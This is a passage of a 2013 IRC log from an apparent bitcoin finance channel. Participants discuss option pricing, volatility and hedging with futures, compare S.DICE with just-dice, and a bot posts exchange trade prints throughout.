26399.30211272, 24 hour low: 66.60001, 24 hour high: 71.11212, 24 hour vwap: 68.68513 Jul 07 17:39:44 to figure out how hedged I am, i need to calculate the total value of my position over different prices btc/usd Jul 07 17:39:58 by the way, using my calculated volatility for bitcoin Jul 07 17:41:10 that put should cost around... .0466 btc Jul 07 17:41:30 which is probably why namworld said he'd be interesting in buying at .05 Jul 07 17:41:50 [BTCTC] [S.DICE-PT] 69 @ 0.0025 = 0.1725 BTC [+] Jul 07 17:42:17 by the way, to calculate the volatility, i looked at historical data over the last year Jul 07 17:42:29 [BTCTC] [DMS.MINING] 1 @ 0.01859 BTC [-] Jul 07 17:42:32 [BTCTC] [S.DICE-PT] 65 @ 0.002525 = 0.1641 BTC [+] Jul 07 17:42:35 meanwhile mpex is selling at 0.44439353 Jul 07 17:42:35 not only on a daily basis (much lower, but irrelevant for a monthly option) Jul 07 17:42:39 what a deal! Jul 07 17:42:55 so i looked at the deviation from the mean for each closing month Jul 07 17:43:04 mean return that is Jul 07 17:43:17 [BTCTC] [S.DICE-PT] 15 @ 0.002535 = 0.038 BTC [+] Jul 07 17:43:20 and that is still around 23 Jul 07 17:43:29 [HAVELOCK] [ASICM] 18 @ 0.041979 = 0.7556 BTC [+] Jul 07 17:43:36 so i looked at the one month in which volatility was the greatest Jul 07 17:43:40 and that is 50 Jul 07 17:43:45 mpex is also paying more than Nam Jul 07 17:43:52 0.05840584 Jul 07 17:43:57 lol Jul 07 17:44:08 sorry.. cant help myself Jul 07 17:44:09 .bait Jul 07 17:44:14 http://25.media.tumblr.com/be4fc61fcb98d455e5c74c31a6aaedc0/tumblr_mgsuk7FnMh1r5cuu2o1_500.jpg Jul 07 17:44:16 well, given vol of 50, that option should cost $3 or so Jul 07 17:44:16 [BTCTC] [S.DICE-PT] 87 @ 0.002545 = 0.2214 BTC [+] Jul 07 17:44:22 yknow you can pm ozbot Jul 07 17:44:27 fap the day away Jul 07 17:44:30 :P Jul 07 17:44:33 perfect Jul 07 17:44:57 nice tats Jul 07 17:45:03 spamming a bot for 1 pic at a time = worst way to fap Jul 07 17:45:06 [BTCTC] [S.DICE-PT] 230 @ 0.00255 = 0.5865 BTC [+] Jul 07 17:45:08 lol Jul 07 17:45:08 [BTCTC] [S.DICE-PT] 6 @ 0.00255 = 0.0153 BTC [+] Jul 07 17:45:19 its good teasing Jul 07 17:45:22 makes you smile Jul 07 17:45:23 Scrat prefers high-speed slideshows Jul 07 17:45:36 is that not called a movie? Jul 07 17:45:40 :) Jul 07 17:46:19 so anyway, i think that the options are really expensive, but it seems to be working for mp, so i understand why he wouldn't offer it cheaper Jul 07 17:46:33 but if i CAN, maybe i can make some money Jul 07 17:46:34 [BTCTC] [ASICMINER-PT] 2 @ 4.2 = 8.4 BTC [+] Jul 07 17:46:47 [BTCTC] [ASICMINER-PT] 2 @ 4.2 = 8.4 BTC [+] Jul 07 17:46:49 [BTCTC] [ASICMINER-PT] 1 @ 4.2 BTC [+] Jul 07 17:46:52 but i don't want to speculate on the rise and fall of btc prices, i just want to arbitrage Jul 07 17:47:05 they aren't working for him currently Jul 07 17:47:11 are they not? Jul 07 17:47:17 i think last month was his loiwest volume to date Jul 07 17:47:18 [BTCTC] [TAT.ASICMINER] 5 @ 0.041157 = 0.2058 BTC [+] Jul 07 17:47:27 oh, volume still seemed pretty high Jul 07 17:47:31 this month not much better Jul 07 17:47:34 i could be wrong Jul 07 17:47:43 [BTCTC] [TAT.ASICMINER] 4 @ 0.041 = 0.164 BTC [-] Jul 07 17:47:45 [BTCTC] [TAT.ASICMINER] 1 @ 0.041 BTC [-] Jul 07 17:47:48 ThickAsThieves: http://i.qkme.me/Bb.jpg Jul 07 17:47:58 lol Jul 07 17:48:04 [HAVELOCK] [ASICM] 10 @ 0.04198 = 0.4198 BTC [+] Jul 07 17:48:12 ctril-tab, ctril-tab, ctril-tab, ctril-tab Jul 07 17:48:18 ctrl* Jul 07 17:48:27 [BTCTC] [TAT.ASICMINER] 74 @ 0.0408 = 3.0192 BTC [-] Jul 07 17:48:40 30 day volume is 71,000 btc... Jul 07 17:48:55 mjrIII, http://trilema.com/2013/mpoe-june-2013-statement/ Jul 07 17:49:48 278 contracts sold Jul 07 17:49:53 in June Jul 07 17:50:04 "One of the slowest option months in history." Jul 07 17:51:56 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004479 BTC [+] Jul 07 17:51:57 [BTCTC] [TAT.VIRTUALMINE] 99 @ 0.00448 = 0.4435 BTC [+] Jul 07 17:52:54 [BTCTC] [TAT.ASICMINER] 5 @ 0.041169 = 0.2058 BTC [+] Jul 07 17:52:56 [BTCTC] [TAT.ASICMINER] 20 @ 0.04117 = 0.8234 BTC [+] Jul 07 17:54:14 What is this channel about exactly? Jul 07 17:54:34 bitcoin finance Jul 07 17:56:40 yeah ok, very low Jul 07 17:57:19 I think if another month or two of low sales go by, he'll adjust Jul 07 17:57:24 well... Jul 07 17:57:30 mjrIII! the legend, you in panama yet? Jul 07 17:57:34 I was just confused by the lack of info on the website I guess Jul 07 17:57:38 he specifically said that because no one is going in the mid market, he is not adjusting Jul 07 17:57:51 so if i jump in, he might compete Jul 07 17:57:57 most irc channels don't even have websites Jul 07 17:58:23 right Jul 07 17:59:02 mostly i've been too busy with other areas to fuss over options lately Jul 07 17:59:04 i just think that most people would be too scared to writeoptions Jul 07 17:59:09 http://thenextweb.com/insider/2013/07/05/flattr-adds-support-for-funding-in-bitcoin-flirts-with-option-to-withdraw-in-the-virtual-currency-too/ Jul 07 17:59:22 stressing over btc/usd was much less enjoyable than trading assets Jul 07 17:59:39 ThickAsThieves, most websites don't even have irc channels ;) Jul 07 18:00:09 well this is an IRC channel with a website Jul 07 18:08:22 I just can't interpret the syntax used by assbot Jul 07 18:09:09 [plattform] [symbol] amount @ price [sold/bought] Jul 07 18:09:33 = [price] xD Jul 07 18:09:38 ... Jul 07 18:09:40 u know what i mean Jul 07 18:09:43 i hope^^ Jul 07 18:12:59 while bitcoin is volatile, it isn't that volatile << so you think. Jul 07 18:13:25 mjrIII, do you think this year's march and april won't happen anymore? Jul 07 18:14:35 the problem is exactly that. you can end up with 500k btc in liabilities. then what ? Jul 07 18:15:02 start thinking not from "o i could make some btc" perspective but fgrom the "how could i employ my btc" perspective. Jul 07 18:15:17 how much premium today would you want to give away your btc capital tomorrow ? Jul 07 18:16:44 [BTCTC] [BFMINES] 500 @ 0.004 = 2 BTC [+] Jul 07 18:17:05 !ticker btct asicminer-pt Jul 07 18:17:06 [BTCT:ASICMINER-PT] 1D: 4.085 / 4.14438 / 4.29495 (124 shares, 513.9 BTC), 7D: 3.59001 / 4.52831 / 5.17 (5205 shares, 23569.9 BTC), 30D: 2.15 / 3.41124 / 5.17 (17701 shares, 60382.3 BTC) Jul 07 18:20:11 [BTCTC] [S.DICE-PT] 1 @ 0.002545 BTC [-] Jul 07 18:26:13 [BTCTC] [ASICMINER-PT] 1 @ 4.139999 BTC [-] Jul 07 18:26:15 [BTCTC] [ASICMINER-PT] 4 @ 4.13 = 16.52 BTC [-] Jul 07 18:26:17 [BTCTC] [ASICMINER-PT] 5 @ 4.12 = 20.6 BTC [-] Jul 07 18:26:48 good points Jul 07 18:27:12 but my point is that when march and april happened, the vol was 50 Jul 07 18:27:23 the implied vol by these prices is 300 Jul 07 18:27:33 and my goal is to acquire bitcoin Jul 07 18:27:41 since i don't have much capital Jul 07 18:27:44 in btc Jul 07 18:28:35 [BTCTC] [DMS.MINING] 1 @ 0.019548 BTC [+] Jul 07 18:29:23 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00448 BTC [+] Jul 07 18:29:23 so, if i can "employ my btc" by writing options and collecting premium, while doing it in a fully backed way (not exposed to the risk at the expense of some profits), then that seems like a great way to acquire more btc Jul 07 18:30:20 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.004481 = 0.009 BTC [+] Jul 07 18:30:35 and also, hopefully see more volume in options Jul 07 18:31:17 as i've said...the goal was not to speculate, the goal was to arbitrage Jul 07 18:31:34 mircea_popescu: does that not make sense? Jul 07 18:32:16 well, i did not understand how... you want to hedge by selling futures? Jul 07 18:32:23 yes Jul 07 18:32:40 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004481 BTC [+] Jul 07 18:32:41 so i can build in profits in either direction to offset losses by the options Jul 07 18:32:44 is there a market with matching liquidity/expiration time? Jul 07 18:32:48 not exactly Jul 07 18:32:58 although let's pretend there is Jul 07 18:33:01 after all Jul 07 18:33:17 i can find one person, and craft my own forward contract between me and him Jul 07 18:33:25 which does entail cp risk Jul 07 18:33:37 but let's say i am more comfortable with the cp risk than i am with the fx risk Jul 07 18:34:06 anyway, if i can for example, sell 10 btc at $68 at months end, and only have to put up 1 btc as collateral Jul 07 18:34:08 sry, what is cp risk? Jul 07 18:34:12 counter party Jul 07 18:34:29 ah Jul 07 18:34:51 so, i am effectively guaranteed to receive $68 per bitcoin at months end, up to 10 bitcoins Jul 07 18:35:14 [HAVELOCK] [ASICM] 1 @ 0.04082 BTC [-] Jul 07 18:35:20 which means that my profit occurs if the price falls, i can sell at the higher price of my contract Jul 07 18:35:43 BUT if the price rises, i still have $680 dollars Jul 07 18:35:46 no matter what Jul 07 18:35:55 fewer bitcoins, but same dollar amount Jul 07 18:36:07 so that would be the future side Jul 07 18:36:10 [MPEX] [S.MPOE] 20800 @ 0.00080532 = 16.7507 BTC [-] Jul 07 18:36:31 since with the future, i profit when price falls, i should be able to take risk in that direction Jul 07 18:36:41 [BTCTC] [COGNITIVE] 1 @ 0.300001 BTC [-] Jul 07 18:36:47 so i write a call Jul 07 18:37:00 sorry, write a put Jul 07 18:37:17 so now, due to the put, i lose money when price falls Jul 07 18:37:29 [BTCTC] [S.DICE-PT] 10 @ 0.002545 = 0.0255 BTC [-] Jul 07 18:37:37 but as the future profits on price falling, it should offset the loss from the put Jul 07 18:37:53 [BTCTC] [S.DICE-PT] 2 @ 0.002535 = 0.0051 BTC [-] Jul 07 18:38:09 if prices rise, i still collect premium, and futures gives me less btc, though same USD Jul 07 18:39:34 remember that i only put up one bitcoin for the future contract, though that allows me to hedge 10 bitcoins prices Jul 07 18:39:59 so i should be able to sell some number of puts (can't figure out how many without actually trying) Jul 07 18:40:44 [BTCTC] [DMS.MINING] 26 @ 0.019547 = 0.5082 BTC [-] Jul 07 18:40:46 [BTCTC] [DMS.MINING] 15 @ 0.019548 = 0.2932 BTC [+] Jul 07 18:40:47 [BTCTC] [DMS.MINING] 219 @ 0.019549 = 4.2812 BTC [+] Jul 07 18:41:07 but the combined premium of that number of puts should more than offset any losses from the future contract if i can charge .15 btc per put Jul 07 18:41:32 that is what i mean by arbitraging the difference between the future and the option Jul 07 18:41:58 of course there are risks Jul 07 18:42:53 and its very complicated, depends on if you measure p&l in btc or USD (that is not as simple a decision as one might think) Jul 07 18:43:43 [HAVELOCK] [ASICM] 1 @ 0.04198 BTC [+] Jul 07 18:43:58 so, i really don't know, all i know is that the implied vol of those prices is 6 times higher than the greatest vol i've observed in any given month Jul 07 18:44:42 meaning there should be signifigant profits in the middle (which no one has tried to take) if you can handle your risk Jul 07 18:44:55 this is simply math Jul 07 18:46:07 now you've lost me Jul 07 18:46:17 [BTCTC] [S.DICE-PT] 1 @ 0.002525 BTC [-] Jul 07 18:46:18 [BTCTC] [S.DICE-PT] 1 @ 0.0025 BTC [-] Jul 07 18:46:18 on "implied vol of those prices" Jul 07 18:46:19 [BTCTC] [S.DICE-PT] 15 @ 0.002405 = 0.0361 BTC [-] Jul 07 18:46:21 [BTCTC] [S.DICE-PT] 146 @ 0.002404 = 0.351 BTC [-] Jul 07 18:46:22 [BTCTC] [S.DICE-PT] 200 @ 0.002403 = 0.4806 BTC [-] Jul 07 18:46:24 [BTCTC] [S.DICE-PT] 400 @ 0.0024 = 0.96 BTC [-] Jul 07 18:46:25 [BTCTC] [S.DICE-PT] 300 @ 0.00239 = 0.717 BTC [-] Jul 07 18:46:25 [BTCTC] [S.DICE-PT] 338 @ 0.002377 = 0.8034 BTC [-] Jul 07 18:46:33 one of the largest factors in an options price is the volatility Jul 07 18:46:43 which is just a measure of how much it moves Jul 07 18:47:07 if you reverse engineer the prices being offered, for the underlying price and the strike price Jul 07 18:47:12 [BTCTC] [BASIC-MINING] 38 @ 0.187 = 7.106 BTC [+] Jul 07 18:47:36 you arrive at implied volatility, or what that person writing/pricing the option thinks the possible moves are Jul 07 18:48:02 at the current prices, that number is 300 Jul 07 18:48:28 oh yes, i somehow thought vol=volume and went derp Jul 07 18:48:44 by looking at historical data i can calculate the daily, monthly, yearly, etc volatilty Jul 07 18:48:59 and even in march and april and may, it never went above 50 Jul 07 18:49:02 [MPEX] [S.MPOE] 3000 @ 0.00080532 = 2.416 BTC [-] Jul 07 18:49:40 meaning if i opened an options contract on the beginning of the month, the change would never have been sharper than volatility of 50 (that was the highest number i could make the spreadsheet give me) Jul 07 18:49:57 if you look at daily volatility, its around 11 i think Jul 07 18:50:46 and to calculate that, i took the "returns" on btc on options expiration days for the last 12 months Jul 07 18:51:01 then calculated their standard deviations from the average return Jul 07 18:51:09 which was much lower than 50 Jul 07 18:51:30 hmm, did you consider they are american style? Jul 07 18:51:51 yes...and that does make it harder to price Jul 07 18:52:08 typically you pay more of a premium for the increased optionality Jul 07 18:52:20 but not like 10x the price of the european option Jul 07 18:52:34 i haven't done the math perfectly Jul 07 18:52:37 or completely Jul 07 18:52:58 but if i do this as a thought experiment Jul 07 18:53:22 [MPEX] [S.MG] 10000 @ 0.00017 = 1.7 BTC [+] Jul 07 18:53:35 there must be a scenario where the premium is not 33% of the underlying Jul 07 18:56:49 so, if the actual greatest volatility we have seen so far is 50, let's assume that is true Jul 07 18:56:52 [BTCTC] [TAT.ASICMINER] 3 @ 0.0406 = 0.1218 BTC [-] Jul 07 18:56:55 underlying premise and all that Jul 07 18:57:03 not sure if you're taking this from the right end Jul 07 18:57:13 perhaps Jul 07 18:57:29 but given that vol is 50, and options are being priced at vol 300 Jul 07 18:57:56 there should be an arbitrage opportunity, i think that is self-evident, no? Jul 07 18:58:05 if the numbers are wrong, of course it wouldn't make sense Jul 07 18:58:19 but if that IS the case...does my hypothesis make sense? Jul 07 18:58:23 i'd rather try to consider btcusd as random walk and determine in which range it's going to stay with, 95% chance during the 1 or 2 months Jul 07 18:58:41 that is a good idea Jul 07 18:58:43 then use that price range as breakeven points for options Jul 07 18:58:56 well, that is what i am trying to do, in a way Jul 07 18:59:01 such model will blow on extremes Jul 07 18:59:17 i am basically trying to show returns for any given price between 40 and 130 Jul 07 18:59:19 ^ yes, someone called that fat tail events Jul 07 18:59:28 yea Jul 07 18:59:30 and yes, it will Jul 07 18:59:30 [BTCTC] [RSM] 30 @ 0.016005 = 0.4802 BTC [+] Jul 07 18:59:35 depending on what you think of as extreme Jul 07 18:59:59 btc is extreme compared to anything Jul 07 19:00:09 300% increase in a month is extreme Jul 07 19:01:26 yes true Jul 07 19:02:10 [BTCTC] [DMS.MINING] 2 @ 0.019549 = 0.0391 BTC [+] Jul 07 19:02:12 [BTCTC] [DMS.MINING] 30 @ 0.019549 = 0.5865 BTC [+] Jul 07 19:02:13 [BTCTC] [DMS.MINING] 90 @ 0.019549 = 1.7594 BTC [+] Jul 07 19:02:50 ;;estimate Jul 07 19:02:51 Next difficulty estimate | 25275743.691 based on data since last change | 24539552.1447 based on data for last three days Jul 07 19:04:52 yes, and for the month where the price tripled, that is where i calculated volatility of 50 Jul 07 19:04:54 [BTCTC] [TAT.VIRTUALMINE] 6 @ 0.004466 = 0.0268 BTC [-] Jul 07 19:05:01 which was the highest vol for any month Jul 07 19:06:28 [BTCTC] [DMS.PURCHASE] 22 @ 0.048994 = 1.0779 BTC [-] Jul 07 19:07:24 [BTCTC] [S.MPOE-PT] 1 @ 0.00099 BTC [+] Jul 07 19:07:26 [HAVELOCK] [HIM] 2 @ 0.34 = 0.68 BTC [-] Jul 07 19:07:31 i think Jul 07 19:07:39 and i arrive at vol by doing the following Jul 07 19:09:05 [BTCTC] [TAT.ASICMINER] 7 @ 0.040551 = 0.2839 BTC [-] Jul 07 19:09:06 [BTCTC] [TAT.ASICMINER] 3 @ 0.04055 = 0.1217 BTC [-] Jul 07 19:09:08 [BTCTC] [TAT.ASICMINER] 105 @ 0.04052 = 4.2546 BTC [-] Jul 07 19:09:10 [BTCTC] [TAT.ASICMINER] 40 @ 0.0405 = 1.62 BTC [-] Jul 07 19:09:12 [BTCTC] [TAT.ASICMINER] 20 @ 0.040202 = 0.804 BTC [-] Jul 07 19:09:14 [BTCTC] [TAT.ASICMINER] 67 @ 0.040162 = 2.6909 BTC [-] Jul 07 19:09:15 [BTCTC] [TAT.ASICMINER] 15 @ 0.04016 = 0.6024 BTC [-] Jul 07 19:09:17 [BTCTC] [TAT.ASICMINER] 44 @ 0.04015 = 1.7666 BTC [-] Jul 07 19:09:19 [BTCTC] [TAT.ASICMINER] 4 @ 0.04012 = 0.1605 BTC [-] Jul 07 19:09:20 [BTCTC] [TAT.ASICMINER] 10 @ 0.04005 = 0.4005 BTC [-] Jul 07 19:09:22 [BTCTC] [TAT.ASICMINER] 3 @ 0.04004 = 0.1201 BTC [-] Jul 07 19:09:24 [BTCTC] [TAT.ASICMINER] 59 @ 0.04002 = 2.3612 BTC [-] Jul 07 19:09:39 square root of the avg(difference from avg return for n periods)^2 Jul 07 19:09:43 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004466 BTC [-] Jul 07 19:09:44 not sure if i wrote that correctly Jul 07 19:10:29 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.004466 = 0.0089 BTC [-] Jul 07 19:13:14 i'm gonna redo the numbers for every day in the last year Jul 07 19:13:19 see what i arrive at, brb Jul 07 19:20:44 [BTCTC] [DMS.PURCHASE] 132 @ 0.048994 = 6.4672 BTC [-] Jul 07 19:23:36 YTD i think daily historical vol is 120 Jul 07 19:23:55 which is much higher, but still not even half of 300 Jul 07 19:24:50 jurov: i think that is your random walk Jul 07 19:25:49 which should correspond to an option price of .11 Jul 07 19:25:50 [HAVELOCK] [ASICM] 1 @ 0.04085 BTC [-] Jul 07 19:26:17 again, these are just using standardized finance tools, which i am not sure how well they apply Jul 07 19:28:29 but intuitively, while the bots options are fully backed, they are not hedged Jul 07 19:28:54 so if you wrote options while hedging you should be able to offer more efficient pricing i would imagine Jul 07 19:31:11 [BTCTC] [DMS.MINING] 1 @ 0.019548 BTC [-] Jul 07 19:31:34 [HAVELOCK] [ASICM] 3 @ 0.04092 = 0.1228 BTC [+] Jul 07 19:32:37 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.004466 = 0.0089 BTC [-] Jul 07 19:33:02 [MPEX] [S.MPOE] 11694 @ 0.00080625 = 9.4283 BTC [+] Jul 07 19:33:56 [BTCTC] [AMC-PT] 1 @ 0.0018 BTC [+] Jul 07 19:36:09 mjrIII, with how much confidence you computed that? Jul 07 19:36:12 [BTCTC] [S.MPOE-PT] 1 @ 0.00099 BTC [+] Jul 07 19:37:32 or it implies that using volatility 120, the model should stay break-even over a long time? Jul 07 19:37:39 [BTCTC] [TAT.VIRTUALMINE] 25 @ 0.004466 = 0.1117 BTC [-] Jul 07 19:40:33 [BTCTC] [TAT.ASICMINER] 25 @ 0.041789 = 1.0447 BTC [+] Jul 07 19:40:34 btw, to get the leverage for your futures, you need to pay interest... and that can eat considerable part of your profit Jul 07 19:43:32 i did some rough estimates while trying to prop up MPBPT, and this haas been a problem, too Jul 07 19:43:45 [BTCTC] [ASICMINER-PT] 5 @ 4.12 = 20.6 BTC [-] Jul 07 19:45:20 are you posting links or only comments? Jul 07 19:48:57 prolly someone turned you in as a known troll Jul 07 19:49:40 :D Jul 07 19:50:35 jurov: it depends, confident enough to try a test program Jul 07 19:51:06 and as far as i can see, no interest calculated on the futures Jul 07 19:51:12 i'm looking at icbit.se Jul 07 19:51:28 though the actual place i get a futures contract from is not relevant Jul 07 19:51:40 as i am pretty sure i can do futures with some businesses Jul 07 19:51:44 to help them Jul 07 19:52:11 but regardless Jul 07 19:52:11 well, if you can insure MPBPT with reasonable terms.. i'm all in Jul 07 19:52:21 nice lol Jul 07 19:52:29 that is what I eventually hope to have Jul 07 19:52:31 insurance services Jul 07 19:52:55 by the way, check out the current edition of the site Jul 07 19:52:55 [BTCTC] [AMC-PT] 6 @ 0.0018 = 0.0108 BTC [+] Jul 07 19:53:03 buttonwood_advanced.meteor.com Jul 07 19:53:20 i am refactoring and debugging the old site and adding it into the new site slowly Jul 07 19:53:24 [BTCTC] [S.DICE-PT] 1 @ 0.002478 BTC [+] Jul 07 19:53:29 and will launch this one at satoshisquare.com when it is ready Jul 07 19:55:52 [BTCTC] [ASICMINER-PT] 3 @ 4.115 = 12.345 BTC [-] Jul 07 19:56:31 [BTCTC] [ASICMINER-PT] 4 @ 4.11 = 16.44 BTC [-] Jul 07 19:56:46 but i basically have to put up .2 bitcoins as collateral to hedge one bitcoin Jul 07 19:57:08 then i collect hopefully .15 bitcoins as premium... Jul 07 19:57:29 [BTCTC] [ASICMINER-PT] 3 @ 4.1 = 12.3 BTC [-] Jul 07 19:57:44 and let's for simplicity's sake say 1 bitcoin for mpex put Jul 07 19:58:22 maybe i should reverse them so i can know with certainty the collateral on the mpex side Jul 07 19:58:32 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004466 BTC [-] Jul 07 19:58:41 sell calls/buy futures Jul 07 20:01:11 What are these quotes? Jul 07 20:01:38 CheckDavid: from assbot? Jul 07 20:01:42 Yes Jul 07 20:02:03 the last one is a "print" from BTCTC for an asset called virtualmine Jul 07 20:02:15 What defines that asset? Jul 07 20:02:20 1 unit was transacted for .004 bitcoin Jul 07 20:02:29 the terms of its creator i suppose Jul 07 20:02:44 Was it transacted on a specific exchange? Jul 07 20:02:49 this is a bit confusing to me yet Jul 07 20:02:51 yes Jul 07 20:02:56 it was a print from btctc Jul 07 20:03:03 if i told you it was a print from nasdaq Jul 07 20:03:04 CheckDavid: BTCT is http://btct.co Jul 07 20:03:09 you would get it? Jul 07 20:03:47 the different exchanges publish market data Jul 07 20:03:56 or should i say broadcast might be more accurate Jul 07 20:04:04 Maybe I would Jul 07 20:04:09 i was just curious Jul 07 20:04:20 what level of understanding of traditional finance you had Jul 07 20:04:26 so i could draw analogies for you Jul 07 20:04:29 is BTCT like the NYSE? Jul 07 20:04:31 or Nasdaq? Jul 07 20:04:49 OH I see now Jul 07 20:04:51 [BTCTC] [TAT.VIRTUALMINE] 63 @ 0.004466 = 0.2814 BTC [-] Jul 07 20:04:55 are you asking for a comparison of which one it is more similar to? Jul 07 20:04:56 [BTCTC] [TAT.VIRTUALMINE] 9 @ 0.004467 = 0.0402 BTC [+] Jul 07 20:05:00 or are you asking if it is like either Jul 07 20:05:09 go there and make your own opinion Jul 07 20:05:09 No, not a comparison of that sort Jul 07 20:05:10 it is an exchange Jul 07 20:05:17 like nyse and nasdaq are exchanges Jul 07 20:05:22 I see. Jul 07 20:05:26 his is too broad question Jul 07 20:05:31 How does a "company" or "business" register there? Jul 07 20:05:51 on mpex, you need to be vetted by mircea_popescu (good luck) Jul 07 20:05:58 Ok ok, you all dominate thsi shit when you were born Jul 07 20:05:59 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.004467 = 0.0447 BTC [+] Jul 07 20:06:01 good, I didn't =_= Jul 07 20:06:11 [BTCTC] [S.DICE-PT] 11 @ 0.002379 = 0.0262 BTC [-] Jul 07 20:06:13 [BTCTC] [S.DICE-PT] 9 @ 0.002378 = 0.0214 BTC [-] Jul 07 20:06:14 [BTCTC] [S.DICE-PT] 17 @ 0.002377 = 0.0404 BTC [-] Jul 07 20:06:16 [BTCTC] [S.DICE-PT] 5 @ 0.002365 = 0.0118 BTC [-] Jul 07 20:06:18 [BTCTC] [S.DICE-PT] 52 @ 0.002358 = 0.1226 BTC [-] Jul 07 20:06:20 [BTCTC] [S.DICE-PT] 50 @ 0.002355 = 0.1178 BTC [-] Jul 07 20:06:21 [BTCTC] [S.DICE-PT] 25 @ 0.00235 = 0.0588 BTC [-] Jul 07 20:06:23 [BTCTC] [S.DICE-PT] 18 @ 0.00235 = 0.0423 BTC [-] Jul 07 20:06:23 [BTCTC] [S.DICE-PT] 3 @ 0.00234 = 0.007 BTC [-] Jul 07 20:06:24 [BTCTC] [S.DICE-PT] 100 @ 0.00232 = 0.232 BTC [-] Jul 07 20:06:25 so, CheckDavid, you see those prints? Jul 07 20:06:25 [BTCTC] [S.DICE-PT] 100 @ 0.0023 = 0.23 BTC [-] Jul 07 20:06:26 [BTCTC] [S.DICE-PT] 30 @ 0.0023 = 0.069 BTC [-] Jul 07 20:06:27 [BTCTC] [S.DICE-PT] 100 @ 0.00225 = 0.225 BTC [-] Jul 07 20:06:29 [BTCTC] [S.DICE-PT] 50 @ 0.0022 = 0.11 BTC [-] Jul 07 20:06:30 [BTCTC] [S.DICE-PT] 2460 @ 0.00215 = 5.289 BTC [-] Jul 07 20:06:31 [BTCTC] [S.DICE-PT] 50 @ 0.00215 = 0.1075 BTC [-] Jul 07 20:06:33 [BTCTC] [S.DICE-PT] 50 @ 0.00211 = 0.1055 BTC [-] Jul 07 20:06:34 [BTCTC] [S.DICE-PT] 975 @ 0.0021 = 2.0475 BTC [-] Jul 07 20:06:34 [BTCTC] [S.DICE-PT] 25 @ 0.00201 = 0.0503 BTC [-] Jul 07 20:06:35 [BTCTC] [S.DICE-PT] 10 @ 0.002002 = 0.02 BTC [-] Jul 07 20:06:37 [BTCTC] [S.DICE-PT] 20 @ 0.002001 = 0.04 BTC [-] Jul 07 20:06:38 [BTCTC] [S.DICE-PT] 200 @ 0.002001 = 0.4002 BTC [-] Jul 07 20:06:39 mjrIII, these ones now? this flood? lol Jul 07 20:06:39 [BTCTC] [S.DICE-PT] 3000 @ 0.002 = 6 BTC [-] Jul 07 20:06:49 that is an equity called s.dice-pt which is what they call a pass through Jul 07 20:06:54 [HAVELOCK] [SDICE] 20 @ 0.192999 = 3.86 BTC [-] Jul 07 20:06:55 [HAVELOCK] [SDICE] 45 @ 0.193 = 8.685 BTC [+] Jul 07 20:06:57 [HAVELOCK] [SDICE] 12 @ 0.1931 = 2.3172 BTC [+] Jul 07 20:06:58 [HAVELOCK] [SDICE] 3 @ 0.1936 = 0.5808 BTC [+] Jul 07 20:06:59 [BTCTC] [S.DICE-PT] 1000 @ 0.002 = 2 BTC [-] Jul 07 20:07:00 [HAVELOCK] [SDICE] 1 @ 0.1937 BTC [+] Jul 07 20:07:00 [HAVELOCK] [SDICE] 3 @ 0.1939 = 0.5817 BTC [+] Jul 07 20:07:20 CheckDavid, read this: https://bitcointalk.org/index.php?topic=125629.0 Jul 07 20:07:35 ChaangNoi: depends on what you think the point of equity markets are Jul 07 20:07:58 Chaang-Noi: i think of it as a place for businesses to sell equity in exchange for capital Jul 07 20:08:03 CheckDavid: if some parts are confusing, you'll still be able to ask better questions Jul 07 20:08:09 in which case, its fine, the businesses who sought capital got it Jul 07 20:08:26 secondary markets are not really important Jul 07 20:08:35 in the grand scheme of things Jul 07 20:08:38 Good bunch of S.DICE trades Jul 07 20:08:58 that remains to be seen, i am confident in mpex Jul 07 20:09:14 sour grapes, goat? Jul 07 20:09:15 maybe Jul 07 20:09:16 [MPEX] [S.MPOE] 7000 @ 0.00080625 = 5.6438 BTC [+] Jul 07 20:09:17 mpex ded Jul 07 20:09:19 no Jul 07 20:09:22 just-dice? What's so great about just-dice? Jul 07 20:09:37 you can infest Jul 07 20:09:43 let's go to blockchain.info and see how many just-dice transactions vs s.dice transactions happen Jul 07 20:09:58 it's off-chain. Jul 07 20:10:07 completely? Jul 07 20:10:18 i thought just-dice gave you both options Jul 07 20:10:39 and i think erik is pretty well trusted Jul 07 20:10:41 no, but I doubt you can see the in/outs, and it would not provide any useful info Jul 07 20:10:49 well... Jul 07 20:10:56 i do see the transactions for s.dice Jul 07 20:11:02 Blah... coinroll all the way... same thing but came earlier. Jul 07 20:11:17 as if there weren't s.dice clones in the past Jul 07 20:11:25 the advantage of satoshi dice, as a gambler, is that the btc go back (or not) to your account quickly. you don't have to put much trust in the operator Jul 07 20:11:43 as an investor, it's all the same really Jul 07 20:12:04 and it's much more convenient on just-dice Jul 07 20:12:12 pankkake: well, as an investory, whichever is more appealing to the consumer is the one i'd rather invest in Jul 07 20:12:33 Chaang-Noi: in what way? Jul 07 20:12:46 just-dice has no fees at each gamble, has immediate results, it's better in almost every way Jul 07 20:13:01 are you referring to when he released 3% more of the company Jul 07 20:13:28 pankkake, so does Coinroll, PrimeDice and plenty others which were there before just-dice or these... Jul 07 20:13:35 Chaang-Noi: omg, you really don't understand s.dice huh Jul 07 20:13:53 its a bitcoin blockchain transaction, how exactly does one block anyone? Jul 07 20:14:00 mjrIII, but erik really did that, or tried to Jul 07 20:14:12 oh, the website that is irrelevant to the actual game Jul 07 20:14:14 oh no Jul 07 20:14:22 i can't look at the list of addresses on that website Jul 07 20:14:26 i have Jul 07 20:14:28 it really seems like it's a liability for evoor Jul 07 20:14:43 [BTCTC] [ASICMINER-PT] 9 @ 4.1 = 36.9 BTC [-] Jul 07 20:14:44 i disagree Jul 07 20:14:51 does blockchain still offer that list? Jul 07 20:15:35 blockchain still direct link SD for its user Jul 07 20:15:35 mjrIII it's not about game itself, that's bulletproof. it's about the owner Jul 07 20:15:41 Major source of gambling for SD Jul 07 20:15:55 and apparently does it "for free" Jul 07 20:16:10 But of course, won't put other website there other than the SD option. Jul 07 20:16:40 [BTCTC] [ASICMINER-PT] 2 @ 4.08 = 8.16 BTC [-] Jul 07 20:17:04 there you go Jul 07 20:17:22 i would argue that more people learn about s.dice because they use blockchain than because they stumbled upon the site Jul 07 20:17:27 